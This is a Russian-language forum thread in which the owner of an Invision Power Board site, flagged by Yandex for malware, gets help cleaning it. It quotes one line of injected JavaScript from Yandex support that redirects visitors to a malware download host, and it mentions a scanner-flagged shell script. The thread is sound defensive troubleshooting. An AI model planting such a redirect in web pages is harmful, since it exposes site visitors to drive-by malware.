Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

А вот что за файлы в папке uploads с расширением .ipb - это что-то кешированное?

У меня там внутри оказалась pdf книга

Вобщем айболит нашел что-то типа шелл-скрипта, но это было в файлах /admin/setup/sources/base/setup.php и /admin/sources/base/ipsRegistry.php - вроде они совпадают с дистрибутивными, но перезалил на всякий случай.

Как разбираться-то с этим всем?

Анализировать каждое уведомление и, если код вызывает подозрение, анализировать код в файле на вредоносность. Многие уведомления через какое-то время отсекаются "битым глазом" на автомате, но естественно нужно знать php и разбираться немного в вопросе безопасности выполняемого кода.

 

А вот что за файлы в папке uploads с расширением .ipb - это что-то кешированное?

Это аттачи.

 

Понаписал мне кучу всего, такое ощущение, что форум состоит из красных строчек...

Да, айболит ругается на все подряд. Конкретно он может сказать только если будут совпадения по сигнатурам вирусов, а потенциально опасные функции которые используются для шеллов нужно изучать вручную. Половина вообще может быть мусор типа error_reporting и прочее.

Яндекс при загрузке форума стал показывать новую картинку и ругается конкретно на этот фрагмент

 

<link rel="stylesheet" type="text/css" media='screen,print' href="http://sport-horse.pro/public/min/index.php?ipbv=c35f60b6f76316196f1bf26c7a6e2b98&f=public/style_css/css_12/videos.css,public/style_css/css_12/SOS_BBCodes.css,public/style_css/css_12/ipb_common.css,public/style_css/css_12/ipb_styles.css,public/style_css/css_12/calendar_select.css,public/style_css/prettify.css" />

http://sport-horse.p...SOS_BBCodes.css

 

Попробуйте внешние ссылки заменить на локальные. И перестроить кеш, шаблона.

Да, какая-то странная ссылка -

http://dl.dropbox.com/u/55648293/Direct/noticetabs.png

Я не придал ей значения сначала, но она не рабочая и у меня нет такого файла нигде.

 

Тупо поменять с дропбокса на локальную?

Да, какая-то странная ссылка -

http://dl.dropbox.com/u/55648293/Direct/noticetabs.png

Я не придал ей значения сначала, но она не рабочая и у меня нет такого файла нигде.

 

Тупо поменять с дропбокса на локальную?

 

Попробуйте.

После замены файла на исправленный при просмотре кода стоит исправленная ссылка.

Если обновить кеш скина, то заново появляется ссылка на дропбокс.

 

Забавно кстати то, что эта самая картинка не открывается с дропбокса вот с таким сообщением:

 

Error (509)
This account's public links are generating too much traffic and have been temporarily disabled!

Не сам файл правьте, а в самом шаблоне в АЦ. И перерасчет кэша шаблонов обязательно.

Понял...

 

Он кстати в АЦ помечен как добавленный шаблон - желтой точкой.

И при нем стоит значок типа знака "кирпич"

 

"Перерасчет кеша шаблонов" - это я не понял.

Перестроил кеш шаблонов всех на всякий случай и выполнил пункт "обновить данные базового скина".

 

Все, похоже теперь исчезла ссылка из кода.

Ну значит тот css был добавлен руками - просто стороннее дополнение, с ручными правками. Его лучше не удалять, а просто сделать правки.

src="http://sport-horse.pro/public/min/index.php?ipbv=c35f60b6f76316196f1bf26c7a6e2b98&f=public/style_css/css_12/videos.css,public/style_css/css_12/SOS_BBCodes.css,public/style_css/css_12/ipb_common.css,public/style_css/css_12/ipb_styles.css,public/style_css/css_12/calendar_select.css,public/style_css/prettify.css"

Точно на этот? Вы не перепутали с этим /index.php?ipbv=c35f60b6f76316196f1bf26c7a6e2b98&g=js? По вашей ссылке только стили подгружаются, а вот во втором варианте как раз грузиться вирус. Смотрите внимательно, эти ссылки легко перепутать - разница в том что стили и скрипты грузятся из папки /public/min/index.php.

 

Попробуйте внешние ссылки заменить на локальные. И перестроить кеш, шаблона.

Да причем здесь ссылки в стилях, это уже параноя. Насколько я знаю через css еще ни один сайт не взламывали.

Сейчас у вас все чисто, редиректов и вредоносных js скриптов нету. Дайте на перепроверку в яндекс вебмастере и ждите результата.

офтопик: О! 6000 постов! ))) Круто!!!

 

Точно не перепутал - всмысле это мне написал яндекс- я же копировал прямо с экрана с красной табличкой.

Это после того как сайт был проверен? Какой вердикт?

 

Вредоносный код:

• обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;
  
• содержит exploit (по данным поведенческого анализатора Яндекса);
  

Вот обращение по адресу который находится в черном списке яндекса может быть проблемой - это встроенные изображения или скрипты с сторонних ресурсов. Но поведенческого анализа я не вижу, возможно это старые данные. Перепроверьте сайт и ждите отчета.